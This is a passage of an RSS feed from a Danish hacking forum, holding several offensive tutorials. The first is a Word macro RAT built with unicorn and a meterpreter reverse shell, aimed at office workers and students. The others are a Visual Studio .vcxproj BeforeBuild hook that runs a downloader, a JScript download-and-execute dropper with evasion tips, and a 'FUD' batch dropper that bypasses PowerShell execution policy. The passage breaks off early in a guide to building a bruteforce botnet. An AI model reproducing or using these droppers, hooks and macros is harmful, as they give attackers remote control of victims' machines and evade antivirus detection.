<li>Nu kan du vælge Sessionen ved, at skrive s<span style="font-weight: bold;" class="mycode_b">essions</span>, nu kan du se en liste over alle dine ofre (i dette tilfælde, dig). Vælg din session, ved at skrive <span style="font-weight: bold;" class="mycode_b">sessions -i 1</span>, så vil du automatisk blive connected til den valgte session.<br />
</li>
<li>Skriv nu <span style="font-weight: bold;" class="mycode_b">help </span>for, at se hvad du kan (generelle metasploit ting)<br />
</li>
<li>Hvis du vil have den til at starte op med computeren, så vil nogle antivirus (ret mange), opdage det. Du kan dog prøve ved at skrive <span style="font-weight: bold;" class="mycode_b">run persistence</span><br />
</li>
</ol>
Du kan også finde ofrets gemte kodeord i ting så som, steam, skype, browsers, etc. Det kan være jeg vil lave en tutorial om det.<br />
<br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: large;" class="mycode_size"><span style="color: #3399ff;" class="mycode_color">Er der noget jeg kan gøre bedre, vil jeg også meget gerne vide det - har du brug for hjælp til noget, eller har du nogle spørgsmål, så er du velkommen til at poste det i kommentar.</span></span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: large;" class="mycode_size"><span style="color: #3399ff;" class="mycode_color">Lad for gudsskyld være med at bruge virustotal... Vi vil jo gerne holde den undetected... :)</span></span></span><br />
<br />
Jeg valgte at lave denne tutorial, fordi jeg tænke den kunne være sjov og effektiv - desuden er den ikke set, så meget (førhen var den meget populær), men nu kan den også bruges i Word 2016, hvor det førhen var de ældre versioner.<br />
<br />
 - TheHacker, ude <img src="https://www.shellsec.pw/images/smilies/facebook/love.png" alt="Love" title="Love" class="smilie smilie_73" />]]></description>
			<content:encoded><![CDATA[Hehe... Så kom der en lille sjov tutorial...<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-size: large;" class="mycode_size"><span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Beskrivelse:</span></span></span></span><br />
I den følgende Tutorial vil du komme til at arbejde med Word Macros (RATs). <br />
Denne metode vil give dig fuld adgang til ofrets computer. <br />
Den måde denne exploit fungere på er, at når en person åbner Word-filen du har sendt, så vil ofrets computer automatisk køre din fil.<br />
Denne metode er 95% FUD. Der er nogle få, der opdager denne RAT, men de færreste.<br />
Word dokumentet lukker med en fejl besked "The document appears to be made on an older version of Microsoft. <br />
Please have the creator save to a newer and supported format.", når det bliver åbnet. Dette kan dog laves om, hvis du vil.<br />
<br />
<br />
<img src="http://nodistribute.com/result/image/lpAJQ4aZhRC1cWrd9EeFDOq.png" alt="[Billede: lpAJQ4aZhRC1cWrd9EeFDOq.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Hvad du skal bruge:</span></span></span><br />
<ul class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">Word 2016 (kan crackes, lidt ligegyldigt) eller hvilket som helst Microsoft Dokument fil</span><br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Kali Linux (hvis det er vmware/virtuelbox, så skal den være bridged)</span><br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Metasploit basic viden</span><br />
</li>
<li>Hjerne<br />
</li>
<li>Viden<br />
</li>
</ul>
<span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Hvem er dette attack målrettet i mod?:</span></span><ul class="mycode_list"><li>Hovedsageligt kontor brugere, elever, skoler, lærere<br />
</li>
<li>Word brugere<br />
</li>
</ul>
<span style="font-size: x-large;" class="mycode_size"><span style="font-family: Impact;" class="mycode_font">Download links:</span></span><ul class="mycode_list"><li><a href="https://github.com/trustedsec/unicorn" target="_blank" rel="noopener" class="mycode_url">https://github.com/trustedsec/unicorn</a><br />
</li>
</ul>
<span style="font-family: Impact;" class="mycode_font"><span style="font-size: x-large;" class="mycode_size"><span style="color: #3399cc;" class="mycode_color">Tutorial:</span></span></span><br />
<ol type="1" class="mycode_list"><li>Tænd din kali linux<br />
</li>
<li>Skriv <span style="font-style: italic;" class="mycode_i">apt-get install git</span>, dette vil installere git, som bla. kan bruges til at hente github repositories<br />
</li>
<li>Skriv <span style="font-style: italic;" class="mycode_i">apt-get install python</span>, for at installere python<br />
</li>
<li>Herefter skal du hente unicorn, det gør du ved at skrive <span style="font-style: italic;" class="mycode_i">git clone <a href="https://github.com/trustedsec/unicorn.git" target="_blank" rel="noopener" class="mycode_url">https://github.com/trustedsec/unicorn.git</a></span><br />
</li>
<li>Nu skal vi ind hvor unicorn er blevet hentet. Det gør du ved at skrive <span style="font-style: italic;" class="mycode_i">cd unicorn</span><br />
</li>
<li>Nu kan du skrive <span style="font-style: italic;" class="mycode_i">python unicorn.py</span> ved, at skrive dette kan du, se hvad du kan bruge scriptet til.<br />
</li>
<li>Du skal nu finde din IP på sider som <a href="https://www.whatismyip.com/" target="_blank" rel="noopener" class="mycode_url">whatismyip</a>, <a href="http://canyouseeme.org/" target="_blank" rel="noopener" class="mycode_url">canyouseeme </a>og eller hvilken som helst anden. Søg blot efter "find my ip" på google.<br />
Jeg anbefaler dog <a href="http://canyouseeme.org/" target="_blank" rel="noopener" class="mycode_url">canyouseeme</a>, da vi kommer til at bruge den senere.<br />
Nu skal du sørge for at din port er portforwarded (håber jeg, du ved hvordan)<br />
</li>
<li>Skriv nu <span style="font-style: italic;" class="mycode_i">python unicorn.py windows/meterpreter/reverse_tcp &lt;din ip&gt; &lt;din valgte port&gt; macro<br />
</span>Du kan nok genkende windows/meterpreter/reverse_tcp fra metasploit.<br />
</li>
<li>Nu opretter den en fil "powershell_attack.txt" her i ligger din macro kode. Den kommer vi til at bruge senere.<br />
</li>
<li>Du kan se, du kan bruge <span style="font-style: italic;" class="mycode_i">msfconsole -r unicorn.rc </span>for at den automatisk kører din payload i metasploit, dog skal vi lige ændre noget.<br />
Skriv <span style="font-style: italic;" class="mycode_i">leafpad unicorn.rc</span> og ændre LHOST til din inet adresse. Denne kan findes ved at skrive <span style="font-style: italic;" class="mycode_i">ifconfig </span>i terminalen. <br />
Grunden til, at vi gør det, er så vi kan listen scriptet på din computer. Du kan ikke bruge den optimalt, hvis du ikke ændre det, <br />
fordi den forsøger at forbinde til din ip, i stedet for din inet adresse.<br />
Jeg har lige opdaget, at den nye version af unicorn har en fejl, der gør, at du også skal ændre LPORT. <br />
LPORT skal ændres til den port, du har portforwarded.<br />
</li>
<li>Åben nu word på din egen computer og opret et dokument,<br />
</li>
<li>Kopier indeholdet fra powershell_attack.txt (leafpad powershell_attack.txt)<br />
</li>
<li>Gå nu ind til dit word dokument igen og tryk under Makroer i: "Dokument (dokument)"--&gt; Herefter Vis --&gt; Makroer --&gt; Opret --&gt; Under Project (Dok1) vælger du "ThisDocument" --&gt; sæt herefter hele powershell scriptet ind.<br />
</li>
<li>Ændre<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite> Sub <span style="color: #ff3333;" class="mycode_color">Auto_Open</span>()<br />
Dim gEmssmj</blockquote>
<br />
til AutoOpen, det vil sige uden _<br />
</li>
<li>Herefter ændre i det, som du vil. Du kan f.eks. fjerne<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Dim title As String<br />
title = "Microsoft Corrupt Document"<br />
Dim msg As String<br />
Dim intResponse As Integer<br />
msg = "The document appears to be made on an older version of Microsoft. <br />
Please have the creator save to a newer and supported format."<br />
intResponse = MsgBox(msg, 16, title)<br />
Application.Quit</blockquote>
 <br />
fra scriptet for at undgå den lukker. Du kan også ændre teksten af fejlbeskeden, hvis du vil.<br />
</li>
<li>Nu kan du vælge at skrive noget i word dokumentet, hvis du vil.<br />
</li>
<li>Vi skal nu gemme word dokumentet (på en speciel måde), gå ind under Filer --&gt; Gem som --&gt;  Gennemse (og vælg, hvor du vil gemme den) --&gt; Under filtype vælger du "Word 97 - 2003-dokumenter (*.doc)"´<br />
</li>
<li>Tryk nu gem<br />
</li>
<li>Gå tilbage til din kali linux og kør <span style="font-style: italic;" class="mycode_i">msfconsole -r unicorn.rc </span>og vent på at den er færdig, hvor der står (<br />
</li>
<li>Starting the payload handler...).<br />
</li>
<li>Prøv nu at åbne dokumentet på din computer (det er sikkert, bare rolig) og se om du kan se noget i din terminal. Hvis du har gjort alt rigtigt, skal der gerne stå (Meterpreter session 1 opened )<br />
</li>
<li>Nu kan du vælge Sessionen ved, at skrive s<span style="font-weight: bold;" class="mycode_b">essions</span>, nu kan du se en liste over alle dine ofre (i dette tilfælde, dig). Vælg din session, ved at skrive <span style="font-weight: bold;" class="mycode_b">sessions -i 1</span>, så vil du automatisk blive connected til den valgte session.<br />
</li>
<li>Skriv nu <span style="font-weight: bold;" class="mycode_b">help </span>for, at se hvad du kan (generelle metasploit ting)<br />
</li>
<li>Hvis du vil have den til at starte op med computeren, så vil nogle antivirus (ret mange), opdage det. Du kan dog prøve ved at skrive <span style="font-weight: bold;" class="mycode_b">run persistence</span><br />
</li>
</ol>
Du kan også finde ofrets gemte kodeord i ting så som, steam, skype, browsers, etc. Det kan være jeg vil lave en tutorial om det.<br />
<br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: large;" class="mycode_size"><span style="color: #3399ff;" class="mycode_color">Er der noget jeg kan gøre bedre, vil jeg også meget gerne vide det - har du brug for hjælp til noget, eller har du nogle spørgsmål, så er du velkommen til at poste det i kommentar.</span></span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: large;" class="mycode_size"><span style="color: #3399ff;" class="mycode_color">Lad for gudsskyld være med at bruge virustotal... Vi vil jo gerne holde den undetected... :)</span></span></span><br />
<br />
Jeg valgte at lave denne tutorial, fordi jeg tænke den kunne være sjov og effektiv - desuden er den ikke set, så meget (førhen var den meget populær), men nu kan den også bruges i Word 2016, hvor det førhen var de ældre versioner.<br />
<br />
 - TheHacker, ude <img src="https://www.shellsec.pw/images/smilies/facebook/love.png" alt="Love" title="Love" class="smilie smilie_73" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Infikcer computere via .sln]]></title>
			<link>https://www.shellsec.pw/traad-infikcer-computere-via-sln</link>
			<pubDate>Wed, 31 Aug 2016 13:10:29 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-infikcer-computere-via-sln</guid>
			<description><![CDATA[.sln are project-fil fra Visual studio og ved at tilføje en simple kan man starte en executeable fil når man starter projektet da når Visual studio starter læser den fra resourcen .vcxproj<br />
Jeg så her i går et post med et javascript som downloader og executer og tænkte at det enligt var lettere at includere men det er op til personen som tager dette i brug.<br />
<br />
<pre class="line-numbers"><code class="language-php">// Du kan jo starte alt fra powershell.<br />
&lt;Target Name="BeforeBuild"&gt;<br />
    &lt;Exec Command="powershell .\download.js" /&gt;<br />
&lt;/Target<br />
<br />
</code></pre>
<br />
Du putter oven stående kode ind i .vcxproj for sln projectet og gemmer og så når sln-filen starter køres filen.<br />
<br />
Her er et eksempel a en redigeret .vcxproj:<br />
<pre class="line-numbers"><code class="language-php">&lt;?xml version="1.0" encoding="utf-8"?&gt;<br />
&lt;Target Name="BeforeBuild"&gt;<br />
    &lt;Exec Command="powershell .\download.js" /&gt;<br />
&lt;/Target<br />
  &lt;ItemGroup&gt;<br />
    &lt;Filter Include="Source Files"&gt;<br />
      &lt;UniqueIdentifier&gt;{---snippet---}&lt;/UniqueIdentifier&gt;<br />
      &lt;Extensions&gt;cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx&lt;/Extensions&gt;<br />
    &lt;/Filter&gt;<br />
    &lt;Filter Include="Header Files"&gt;<br />
      &lt;UniqueIdentifier&gt;{---snippet---}&lt;/UniqueIdentifier&gt;<br />
      &lt;Extensions&gt;h;hh;hpp;hxx;hm;inl;inc;xsd&lt;/Extensions&gt;<br />
    &lt;/Filter&gt;<br />
    &lt;Filter Include="Resource Files"&gt;<br />
      &lt;UniqueIdentifier&gt;{---snippet---}&lt;/UniqueIdentifier&gt;<br />
      &lt;Extensions&gt;rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms&lt;/Extensions&gt;<br />
    &lt;/Filter&gt;<br />
  &lt;/ItemGroup&gt;<br />
  &lt;ItemGroup&gt;<br />
    &lt;ClCompile Include="main.cpp"&gt;<br />
      &lt;Filter&gt;Source Files&lt;/Filter&gt;<br />
    &lt;/ClCompile&gt;<br />
  &lt;/ItemGroup&gt;<br />
  &lt;ItemGroup&gt;<br />
    &lt;ClInclude Include="---snippet---"&gt;<br />
      &lt;Filter&gt;Header Files&lt;/Filter&gt;<br />
    &lt;/ClInclude&gt;<br />
    &lt;ClInclude Include="---snippet---"&gt;<br />
      &lt;Filter&gt;Source Files&lt;/Filter&gt;<br />
    &lt;/ClInclude&gt;<br />
  &lt;/ItemGroup&gt;<br />
  &lt;ItemGroup&gt;<br />
    &lt;ResourceCompile Include="Katelyn.rc"&gt;<br />
      &lt;Filter&gt;Resource Files&lt;/Filter&gt;<br />
    &lt;/ResourceCompile&gt;<br />
  &lt;/ItemGroup&gt;<br />
  &lt;ItemGroup&gt;<br />
    &lt;Image Include="---snippet---"&gt;<br />
      &lt;Filter&gt;Resource Files&lt;/Filter&gt;<br />
    &lt;/Image&gt;<br />
  &lt;/ItemGroup&gt;<br />
&lt;/Project&gt;<br />
</code></pre>]]></description>
			<content:encoded><![CDATA[.sln are project-fil fra Visual studio og ved at tilføje en simple kan man starte en executeable fil når man starter projektet da når Visual studio starter læser den fra resourcen .vcxproj<br />
Jeg så her i går et post med et javascript som downloader og executer og tænkte at det enligt var lettere at includere men det er op til personen som tager dette i brug.<br />
<br />
<pre class="line-numbers"><code class="language-php">// Du kan jo starte alt fra powershell.<br />
&lt;Target Name="BeforeBuild"&gt;<br />
    &lt;Exec Command="powershell .\download.js" /&gt;<br />
&lt;/Target<br />
<br />
</code></pre>
<br />
Du putter oven stående kode ind i .vcxproj for sln projectet og gemmer og så når sln-filen starter køres filen.<br />
<br />
Her er et eksempel a en redigeret .vcxproj:<br />
<pre class="line-numbers"><code class="language-php">&lt;?xml version="1.0" encoding="utf-8"?&gt;<br />
&lt;Target Name="BeforeBuild"&gt;<br />
    &lt;Exec Command="powershell .\download.js" /&gt;<br />
&lt;/Target<br />
  &lt;ItemGroup&gt;<br />
    &lt;Filter Include="Source Files"&gt;<br />
      &lt;UniqueIdentifier&gt;{---snippet---}&lt;/UniqueIdentifier&gt;<br />
      &lt;Extensions&gt;cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx&lt;/Extensions&gt;<br />
    &lt;/Filter&gt;<br />
    &lt;Filter Include="Header Files"&gt;<br />
      &lt;UniqueIdentifier&gt;{---snippet---}&lt;/UniqueIdentifier&gt;<br />
      &lt;Extensions&gt;h;hh;hpp;hxx;hm;inl;inc;xsd&lt;/Extensions&gt;<br />
    &lt;/Filter&gt;<br />
    &lt;Filter Include="Resource Files"&gt;<br />
      &lt;UniqueIdentifier&gt;{---snippet---}&lt;/UniqueIdentifier&gt;<br />
      &lt;Extensions&gt;rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms&lt;/Extensions&gt;<br />
    &lt;/Filter&gt;<br />
  &lt;/ItemGroup&gt;<br />
  &lt;ItemGroup&gt;<br />
    &lt;ClCompile Include="main.cpp"&gt;<br />
      &lt;Filter&gt;Source Files&lt;/Filter&gt;<br />
    &lt;/ClCompile&gt;<br />
  &lt;/ItemGroup&gt;<br />
  &lt;ItemGroup&gt;<br />
    &lt;ClInclude Include="---snippet---"&gt;<br />
      &lt;Filter&gt;Header Files&lt;/Filter&gt;<br />
    &lt;/ClInclude&gt;<br />
    &lt;ClInclude Include="---snippet---"&gt;<br />
      &lt;Filter&gt;Source Files&lt;/Filter&gt;<br />
    &lt;/ClInclude&gt;<br />
  &lt;/ItemGroup&gt;<br />
  &lt;ItemGroup&gt;<br />
    &lt;ResourceCompile Include="Katelyn.rc"&gt;<br />
      &lt;Filter&gt;Resource Files&lt;/Filter&gt;<br />
    &lt;/ResourceCompile&gt;<br />
  &lt;/ItemGroup&gt;<br />
  &lt;ItemGroup&gt;<br />
    &lt;Image Include="---snippet---"&gt;<br />
      &lt;Filter&gt;Resource Files&lt;/Filter&gt;<br />
    &lt;/Image&gt;<br />
  &lt;/ItemGroup&gt;<br />
&lt;/Project&gt;<br />
</code></pre>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Javascript Download+Execute]]></title>
			<link>https://www.shellsec.pw/traad-javascript-download-execute</link>
			<pubDate>Mon, 11 Jul 2016 18:36:22 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-javascript-download-execute</guid>
			<description><![CDATA[Eftersom vi allerede har en tråd omhandlende infektion med batch liggende her:<br />
<a href="https://www.shellsec.pw/traad-simpelt-fud-batch-script-med-file-dropper" target="_blank" rel="noopener" class="mycode_url">https://www.shellsec.pw/traad-simpelt-fu...le-dropper</a><br />
Tænkte jeg, at jeg lige så godt kunne dele dette javascript - script...<br />
<br />
Det sidste stykke tid er der dukket en del artikler op, der handler om inficering ved hjælp af Javascript-filer. <br />
Her er et eksempel fra v2: <a href="https://www.version2.dk/artikel/sophos-ransomware-er-hoppet-fra-word-dokumenter-til-javascript-filer-737254" target="_blank" rel="noopener" class="mycode_url">https://www.version2.dk/artikel/sophos-r...ler-737254</a><br />
<br />
Disse scripts køres altså ikke på nettet, men til gengæld på maskinen selv, ved hjælp af Windows Script Host.<br />
<br />
Nedenstående script vil downloade og køre Putty.exe samt Demystifying_Google_Hacks.doc(Hvis man har et program, såsom Word, til at håndtere filtypen), når der dobbelt-klikkes på det.<br />
Jeg tror ikke scriptet behøver videre forklaring, da det absolut giver sig selv. Der er ikke mulighed for at ændre ikon, som vi kender det fra eksekverbare filer, men jeg tror stadig den 'mindre kendte' filtype/endelse opvejer den negativ.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">JSDownloader.js</span><br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>var activeX= this['ActiveXObject'];<br />
var wShell = new activeX('WScript.Shell');<br />
var cObject = WScript.CreateObject('MSXML2.XMLHTTP');<br />
<br />
hentFil('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe', gemSom('putty.exe'));<br />
hentFil('http://www.infosecwriters.com/text_resources/doc/Demystifying_Google_Hacks.doc', gemSom('doc.doc'));<br />
<br />
function hentFil(fil, mappe){<br />
cObject.Open('GET', fil, false);<br />
cObject.Send();<br />
<br />
if (cObject.Status == 200)<br />
{<br />
<br />
    var Stream = WScript.CreateObject('ADODB.Stream');<br />
<br />
    var i = Stream.Open();<br />
    var o = Stream.Type = 1; // adTypeBinary<br />
    var u = Stream.Write(cObject.ResponseBody);<br />
    var y = Stream.Position = 0;<br />
<br />
    var File = WScript.CreateObject('Scripting.FileSystemObject');<br />
    if (File.FileExists(mappe))<br />
    {<br />
        File.DeleteFile(mappe);<br />
    }<br />
<br />
    Stream.SaveToFile(mappe, 2); // adSaveCreateOverWrite<br />
    Stream.Close();<br />
    <br />
    var objShell = new ActiveXObject("WScript.shell");<br />
    objShell.run(mappe);<br />
    }<br />
}<br />
<br />
function gemSom(filNavn){<br />
    var tempMappe = wShell['ExpandEnvironmentStrings']('%TEMP%') + '/';<br />
    return tempMappe + filNavn;<br />
}</code></div></div><br />
<br />
Mulige forbedringer og bemærkninger:<br />
- Man kunne i stedet køre en loop hvis der skal hentes flere filer<br />
- Man kunne bruge obfuscation, da dette er trivielt nemt i Javascript<br />
- Man kan pumpe filstørrelsen, så den stemmer mere overens med et normalt dokument<br />
<br />
6/55 på VirusTotal:<br />
<a href="https://virustotal.com/da/file/93d421adc4fd009124ba0a3ae460641855e6bf488af76c1d19a853eac200da8c/analysis/1468251292/" target="_blank" rel="noopener" class="mycode_url">https://virustotal.com/da/file/93d421adc...468251292/</a>]]></description>
			<content:encoded><![CDATA[Eftersom vi allerede har en tråd omhandlende infektion med batch liggende her:<br />
<a href="https://www.shellsec.pw/traad-simpelt-fud-batch-script-med-file-dropper" target="_blank" rel="noopener" class="mycode_url">https://www.shellsec.pw/traad-simpelt-fu...le-dropper</a><br />
Tænkte jeg, at jeg lige så godt kunne dele dette javascript - script...<br />
<br />
Det sidste stykke tid er der dukket en del artikler op, der handler om inficering ved hjælp af Javascript-filer. <br />
Her er et eksempel fra v2: <a href="https://www.version2.dk/artikel/sophos-ransomware-er-hoppet-fra-word-dokumenter-til-javascript-filer-737254" target="_blank" rel="noopener" class="mycode_url">https://www.version2.dk/artikel/sophos-r...ler-737254</a><br />
<br />
Disse scripts køres altså ikke på nettet, men til gengæld på maskinen selv, ved hjælp af Windows Script Host.<br />
<br />
Nedenstående script vil downloade og køre Putty.exe samt Demystifying_Google_Hacks.doc(Hvis man har et program, såsom Word, til at håndtere filtypen), når der dobbelt-klikkes på det.<br />
Jeg tror ikke scriptet behøver videre forklaring, da det absolut giver sig selv. Der er ikke mulighed for at ændre ikon, som vi kender det fra eksekverbare filer, men jeg tror stadig den 'mindre kendte' filtype/endelse opvejer den negativ.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">JSDownloader.js</span><br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>var activeX= this['ActiveXObject'];<br />
var wShell = new activeX('WScript.Shell');<br />
var cObject = WScript.CreateObject('MSXML2.XMLHTTP');<br />
<br />
hentFil('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe', gemSom('putty.exe'));<br />
hentFil('http://www.infosecwriters.com/text_resources/doc/Demystifying_Google_Hacks.doc', gemSom('doc.doc'));<br />
<br />
function hentFil(fil, mappe){<br />
cObject.Open('GET', fil, false);<br />
cObject.Send();<br />
<br />
if (cObject.Status == 200)<br />
{<br />
<br />
    var Stream = WScript.CreateObject('ADODB.Stream');<br />
<br />
    var i = Stream.Open();<br />
    var o = Stream.Type = 1; // adTypeBinary<br />
    var u = Stream.Write(cObject.ResponseBody);<br />
    var y = Stream.Position = 0;<br />
<br />
    var File = WScript.CreateObject('Scripting.FileSystemObject');<br />
    if (File.FileExists(mappe))<br />
    {<br />
        File.DeleteFile(mappe);<br />
    }<br />
<br />
    Stream.SaveToFile(mappe, 2); // adSaveCreateOverWrite<br />
    Stream.Close();<br />
    <br />
    var objShell = new ActiveXObject("WScript.shell");<br />
    objShell.run(mappe);<br />
    }<br />
}<br />
<br />
function gemSom(filNavn){<br />
    var tempMappe = wShell['ExpandEnvironmentStrings']('%TEMP%') + '/';<br />
    return tempMappe + filNavn;<br />
}</code></div></div><br />
<br />
Mulige forbedringer og bemærkninger:<br />
- Man kunne i stedet køre en loop hvis der skal hentes flere filer<br />
- Man kunne bruge obfuscation, da dette er trivielt nemt i Javascript<br />
- Man kan pumpe filstørrelsen, så den stemmer mere overens med et normalt dokument<br />
<br />
6/55 på VirusTotal:<br />
<a href="https://virustotal.com/da/file/93d421adc4fd009124ba0a3ae460641855e6bf488af76c1d19a853eac200da8c/analysis/1468251292/" target="_blank" rel="noopener" class="mycode_url">https://virustotal.com/da/file/93d421adc...468251292/</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Simpelt FUD Batch script med file dropper]]></title>
			<link>https://www.shellsec.pw/traad-simpelt-fud-batch-script-med-file-dropper</link>
			<pubDate>Tue, 02 Feb 2016 20:15:01 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-simpelt-fud-batch-script-med-file-dropper</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align">Bare lige et lille batchscript jeg har liggende som downloader en fil til /temp/file og derefter executer den så du for en succesfull installation af din fil<br />
Filen skal selvfølgelig helst være Runtime FUD men selv filer med detektioner kommer ofte igennem.<br />
<br />
Batch scripted er lidt tricky at få folk til at åbne, men den kan da bindes til en anden fil.<br />
<br />
Destinationen på filen kan  ændres i scripted med lidt basal batch script forståelse.<br />
<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>@echo off<br />
mkdir %tmp%&#92;file&#92;  &gt; nul 2&gt; nul<br />
echo Please wait, loading...<br />
echo &#36;down = New-Object System.Net.WebClient &gt; %tmp%&#92;file&#92;flash_log_backup.ps1<br />
echo &#36;url  = 'INDSÆT DIRECT DOWNLOAD LINK HER'; &gt;&gt; %tmp%&#92;file&#92;flash_log_backup.ps1<br />
echo &#36;file = '%tmp%&#92;file&#92;flash_log_backup.exe'; &gt;&gt; %tmp%&#92;file&#92;flash_log_backup.ps1<br />
echo &#36;down.DownloadFile(&#36;url,&#36;file); &gt;&gt; %tmp%&#92;file&#92;flash_log_backup.ps1<br />
echo &#36;exec = New-Object -com shell.application &gt;&gt; %tmp%&#92;file&#92;flash_log_backup.ps1<br />
echo &#36;exec.shellexecute(&#36;file); &gt;&gt; %tmp%&#92;file&#92;flash_log_backup.ps1<br />
powershell.exe -executionpolicy bypass -file %tmp%&#92;file&#92;flash_log_backup.ps1<br />
echo msgbox "ERR?R!" &gt; %tmp%&#92;tmp.vbs<br />
cscript /nologo %tmp%&#92;tmp.vbs<br />
del %tmp%&#92;tmp.vbs<br />
exit</code></div></div></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align">Bare lige et lille batchscript jeg har liggende som downloader en fil til /temp/file og derefter executer den så du for en succesfull installation af din fil<br />
Filen skal selvfølgelig helst være Runtime FUD men selv filer med detektioner kommer ofte igennem.<br />
<br />
Batch scripted er lidt tricky at få folk til at åbne, men den kan da bindes til en anden fil.<br />
<br />
Destinationen på filen kan  ændres i scripted med lidt basal batch script forståelse.<br />
<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>@echo off<br />
mkdir %tmp%&#92;file&#92;  &gt; nul 2&gt; nul<br />
echo Please wait, loading...<br />
echo &#36;down = New-Object System.Net.WebClient &gt; %tmp%&#92;file&#92;flash_log_backup.ps1<br />
echo &#36;url  = 'INDSÆT DIRECT DOWNLOAD LINK HER'; &gt;&gt; %tmp%&#92;file&#92;flash_log_backup.ps1<br />
echo &#36;file = '%tmp%&#92;file&#92;flash_log_backup.exe'; &gt;&gt; %tmp%&#92;file&#92;flash_log_backup.ps1<br />
echo &#36;down.DownloadFile(&#36;url,&#36;file); &gt;&gt; %tmp%&#92;file&#92;flash_log_backup.ps1<br />
echo &#36;exec = New-Object -com shell.application &gt;&gt; %tmp%&#92;file&#92;flash_log_backup.ps1<br />
echo &#36;exec.shellexecute(&#36;file); &gt;&gt; %tmp%&#92;file&#92;flash_log_backup.ps1<br />
powershell.exe -executionpolicy bypass -file %tmp%&#92;file&#92;flash_log_backup.ps1<br />
echo msgbox "ERR?R!" &gt; %tmp%&#92;tmp.vbs<br />
cscript /nologo %tmp%&#92;tmp.vbs<br />
del %tmp%&#92;tmp.vbs<br />
exit</code></div></div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Premium Vejledning | Bruteforce et stort botnet]]></title>
			<link>https://www.shellsec.pw/traad-premium-vejledning-bruteforce-et-stort</link>
			<pubDate>Mon, 24 Aug 2015 23:08:42 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-premium-vejledning-bruteforce-et-stort</guid>
			<description><![CDATA[<span style="color: #FF4500;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><div style="text-align: center;" class="mycode_align">Light Aidra og LRAB - Bruteforce dig til et stort botnet.<br />
Vejledning af Sc0rp10n</div></span></span><br />
<br />
Du skal have en dedikeret server som tillader scanning og hvilken som helst server som er unmetered.<br />
<br />
Download Light Aidra her: <a href="http://0xplanet.com/archive/Botnets/LightHydra/lightaidra-master.zip" target="_blank" rel="noopener" class="mycode_url">http://0xplanet.com/archive/Botnets/Ligh...master.zip</a><br />
Efter du har unzippet filen og omdøbt filen til noget kort.<br />
Når LA er placeret et sted og omdøbt så cd hen til LA så skriv mkdir bin -<br />
Derefter cd til bin og skriv derefter nano s.sh og tilføj cross compliers.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Cross compliers i raw link format</span>: <a href="http://pastebin.com/raw.php?i=edrqt9RB" target="_blank" rel="noopener" class="mycode_url">http://pastebin.com/raw.php?i=edrqt9RB</a><br />
<pre class="line-numbers"><code class="language-php">wget <a href="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2" target="_blank" rel="noopener" class="mycode_url">http://uclibc.org/downloads/binaries/0.9...ps.tar.bz2</a> &amp;&amp; tar -xvjf cross-compiler-mips.tar.bz2 &amp;&amp; rm -rf cross-compiler-mips.tar.bz2<br />
wget <a href="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2" target="_blank" rel="noopener" class="mycode_url">http://uclibc.org/downloads/binaries/0.9...el.tar.bz2</a> &amp;&amp; tar -xvjf cross-compiler-mipsel.tar.bz2 &amp;&amp; rm -rf cross-compiler-mipsel.tar.bz2<br />
wget <a href="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2" target="_blank" rel="noopener" class="mycode_url">http://uclibc.org/downloads/binaries/0.9...5l.tar.bz2</a> &amp;&amp; tar -xvjf cross-compiler-armv5l.tar.bz2 &amp;&amp; rm -rf cross-compiler-armv5l.tar.bz2<br />
wget <a href="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2" target="_blank" rel="noopener" class="mycode_url">http://uclibc.org/downloads/binaries/0.9...pc.tar.bz2</a> &amp;&amp; tar -xvjf cross-compiler-powerpc.tar.bz2  &amp;&amp; rm -rf cross-compiler-powerpc.tar.bz2<br />
